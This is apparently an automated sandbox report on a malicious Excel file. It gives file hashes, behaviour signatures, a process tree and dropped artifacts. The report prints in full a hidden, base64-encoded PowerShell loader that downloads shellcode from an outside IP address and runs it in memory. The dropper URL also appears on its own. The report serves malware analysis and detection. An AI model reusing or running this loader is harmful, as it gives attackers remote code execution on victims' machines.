Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    13-11-2024 21:58

General

  • Target

    5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls

  • Size

    46KB

  • MD5

    434d89ccf58222a7a8677f194a7eec0a

  • SHA1

    fe29a64739dea4e8bf40fa0a5e02e88bed417c32

  • SHA256

    5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f

  • SHA512

    2386756bf990e6b3b72baad089d87078fb3a837b0f1e1a1d4be4be582749eb8d2b74e8ba416aeed58dc6c3d2cf6436f9c9ac082ded470165f3601b81b9546cbe

  • SSDEEP

    768:d4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:qSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2988
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2452

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp

    Filesize

    1KB

    MD5

    96d3563fa093dde2099b93fb6f3c6053

    SHA1

    0053ec01c09a73af92c1d1c03e44a3ca674cc5e4

    SHA256

    6ef59f115a4c4f3c25ffe171be2b86371e6084fdee179ccd4cb1bc29caf966a4

    SHA512

    eb8052443bd3e88bf5758a0cddf9134568313fa6aaed150e0e26fe4bf2bf9a25d72198e353b4a6a81e7d836d9dfa41c40398b03225c11615f267acc6dcb9961a

  • C:\Users\Admin\AppData\Local\Temp\ztdg0y54.dll

    Filesize

    3KB

    MD5

    ded5c1d028402a58f25356d5965eb33e

    SHA1

    2cc7c6327e2f806c33e71ac97bbc47815302f105

    SHA256

    252bd54f2c4f254693a739af65427f62c3f4d8b59514613c332848fb7b836ecf

    SHA512

    6073aa86fc95cdeeaf59ec176c1489e90716b28d5ea4a0c43ee3a752a517886774b03871ec6f02eb4de46bcc9bd3254b7794ae35e2bafb67285aec4b1736b8f2

  • C:\Users\Admin\AppData\Local\Temp\ztdg0y54.pdb

    Filesize

    7KB

    MD5

    8086a47d28b8c125c8392c53f127ea57

    SHA1

    228a87d4f7f611ff1c147911c08b736f4ffd2490

    SHA256

    aca9e9e7902195692dc83d27dff689bb400e90c3ac9a1f286956bbf75b1407b6

    SHA512

    a3e316420fe3f743a88dc253bd11525cb00559dd025b4c0be44541e68c4ac049eb1e8c15edbe90aefc273a8db3025e83bbd54b940fee772577032322218304a5

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp

    Filesize

    652B

    MD5

    dc9eb10b07859e23d805cc32941918e7

    SHA1

    757fb1eb624141296c5c69383e573d6b886e5eb6

    SHA256

    792dd3954357714c0f76dcfdf5a82e73e74478716d9a44ec96a9c5295447675b

    SHA512

    1be67799830ed882664a33741f9d6ef1f821a0169741fd97b3d22341f181de696d803a05536de8746f8c82d96d12e8931df27a7ed8f66a754be5808a7be1d7ae

  • \??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.0.cs

    Filesize

    631B

    MD5

    f4dd5c682eb7b3b679f084261bfc7c4c

    SHA1

    70f75d7a4e42c185eb09139ed3c6f7338a2219c2

    SHA256

    2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

    SHA512

    8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

  • \??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline

    Filesize

    309B

    MD5

    cc13bf030191cde69868e4b27e748256

    SHA1

    7a985d84475dabb80d02aac739d3b24124e1d20c

    SHA256

    bb060f760a5b9ec469bb5f563ab0944aa837dae50f535a082465130d8da889ab

    SHA512

    ff24139b79333a0ec3f99c72074c69cee411133f3964431620280a7df60a4ad7e5104cfd94a0f16c3975e1ef246a4ce9e5ae7d82cf51dcf389ae6b9b837fbd12

  • memory/2988-8-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-6-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-4-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-7-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-9-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/2988-3-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-2-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-1-0x000000007202D000-0x0000000072038000-memory.dmp

    Filesize

    44KB

  • memory/2988-27-0x000000007202D000-0x0000000072038000-memory.dmp

    Filesize

    44KB

  • memory/2988-28-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB

  • memory/2988-29-0x0000000000200000-0x0000000000300000-memory.dmp

    Filesize

    1024KB